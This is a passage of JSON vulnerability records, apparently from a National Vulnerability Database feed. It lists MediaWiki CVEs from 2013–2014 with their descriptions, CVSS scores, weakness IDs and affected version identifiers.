"cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.22.2"], "id": "CVE-2014-5242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:38:54", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 accepts certain long callback values and does not restrict the initial bytes of a JSONP response, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks, and obtain sensitive information, via a crafted OBJECT element with SWF content consistent with a restricted character set.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5241", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.14", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.21.10", "cpe:/a:mediawiki:mediawiki:1.21.9", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-5241", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:06", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6453", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-13T14:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.4"], "id": "CVE-2013-6453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:07", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG file.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6452", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-13T13:36:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6452", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:28", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted page via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6472", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-13T14:43:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:39:00", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 does not enforce an IFRAME protection mechanism for transcluded pages, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5243", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.14", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.21.10", "cpe:/a:mediawiki:mediawiki:1.21.9", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-5243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:04", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "type": "cve", "title": "CVE-2013-6451", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-30T18:32:00", "cpe": [], "id": "CVE-2013-6451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6451", "cvss": {"score": 4.3, "vector": 